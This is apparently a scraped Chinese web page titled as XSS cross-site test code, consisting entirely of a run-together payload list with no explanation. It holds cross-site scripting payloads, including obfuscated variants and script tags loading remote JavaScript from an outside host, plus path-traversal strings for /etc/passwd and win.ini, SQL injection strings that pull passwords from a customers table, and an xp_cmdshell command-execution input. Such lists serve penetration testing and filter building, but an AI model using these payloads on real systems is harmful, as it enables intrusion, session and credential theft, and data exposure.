XSS跨站测试代码

XSS跨站测试代码

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107

'><script>alert(document.cookie)</script> =' ><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> %3Cscript%3Ealert( 'XSS' )%3C/script%3E <script>alert( 'XSS' )</script> <img src= "javascript:alert('XSS')" > %0a%0a<script>alert(\ "Vulnerable\")</script>.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp <script>alert('Vulnerable');</script> <script>alert('Vulnerable')</script> ?sql_debug=1 a%5c.aspx a.jsp/<script>alert('Vulnerable')</script> a/ a?<script>alert('Vulnerable')</script> " ><script>alert( 'Vulnerable' )</script> ';exec%20master..xp_cmdshell%20' dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt '--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini ' ';!--"<XSS>=&{()} <IMG src="javascript:alert(' XSS ');"> <IMG src=javascript:alert(' XSS ')> <IMG src=JaVaScRiPt:alert(' XSS ')> <IMG src=JaVaScRiPt:alert("XSS")> <IMG src=javascript:alert(' XSS ')> <IMG src=javascript:alert(' XSS ')> <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG src="jav ascript:alert(' XSS ');"> <IMG src="jav ascript:alert(' XSS ');"> <IMG src="jav ascript:alert(' XSS ');"> "<IMG src=java\0script:alert(\"XSS\")>";'  > out <IMG src= " javascript:alert('XSS');" > <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> <BODY BACKGROUND= "javascript:alert('XSS')" > <BODY ONLOAD=alert( 'XSS' )> <IMG DYNSRC= "javascript:alert('XSS')" > <IMG LOWSRC= "javascript:alert('XSS')" > <BGSOUND src= "javascript:alert('XSS');" > <br size= "&{alert('XSS')}" > <LAYER src= "http://xss.ha.ckers.org/a.js" ></layer> <LINK REL= "stylesheet"  href= "javascript:alert('XSS');" > <IMG src= 'vbscript:msgbox("XSS")' > <IMG src= "mocha:[code]" > <IMG src= "livescript:[code]" > <META HTTP-EQUIV= "refresh"  CONTENT= "0;url=javascript:alert('XSS');" > <IFRAME src=javascript:alert( 'XSS' )></IFRAME> <FRAMESET><FRAME src=javascript:alert( 'XSS' )></FRAME></FRAMESET> <TABLE BACKGROUND= "javascript:alert('XSS')" > <DIV STYLE= "background-image: url(javascript:alert('XSS'))" > <DIV STYLE= "behaviour: url('http://www.how-to-hack.org/exploit.html');" > <DIV STYLE= "width: expression(alert('XSS'));" > <STYLE>@im\port '\ja\vasc\ript:alert("XSS")' ;</STYLE> <IMG STYLE= 'xss:expre\ssion(alert("XSS"))' > <STYLE TYPE= "text/javascript" >alert( 'XSS' );</STYLE> <STYLE TYPE= "text/css" >.XSS{background-image:url( "javascript:alert('XSS')" );}</STYLE><A  class = "XSS" ></A> <STYLE type= "text/css" >BODY{background:url( "javascript:alert('XSS')" )}</STYLE> <BASE href= "javascript:alert('XSS');//" > getURL( "javascript:alert('XSS')" ) a= "get" ;b= "URL" ;c= "javascript:" ;d= "alert('XSS');" ;eval(a+b+c+d); <XML src= "javascript:alert('XSS');" > "> <BODY ONLOAD=" a(); "><SCRIPT>function a(){alert('XSS');}</SCRIPT><" <SCRIPT src= "http://xss.ha.ckers.org/xss.jpg" ></SCRIPT> <IMG src= "javascript:alert('XSS')" <!-- #exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> <IMG src= "http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" > <SCRIPT a= ">"  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT> <SCRIPT = ">"  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT> <SCRIPT a= ">"  ''  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT> <SCRIPT  "a='>'"  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT> <SCRIPT>document.write( "<SCRI" );</SCRIPT>PT src= "http://xss.ha.ckers.org/a.js" ></SCRIPT> <A href=http: //www.gohttp://www.google.com/ogle.com/>link</A> admin '-- '  or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # "  or 0=0  # or 0=0  # ' or  'x' = 'x " or "x"="x ' ) or ( 'x' = 'x '  or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- "  or  "a" = "a ') or ('a'='a " ) or ( "a" = "a hi"  or  "a" = "a hi"  or 1=1 -- hi' or 1=1 -- hi ' or ' a '=' a hi ') or (' a '=' a hi ") or (" a "=" a[/code]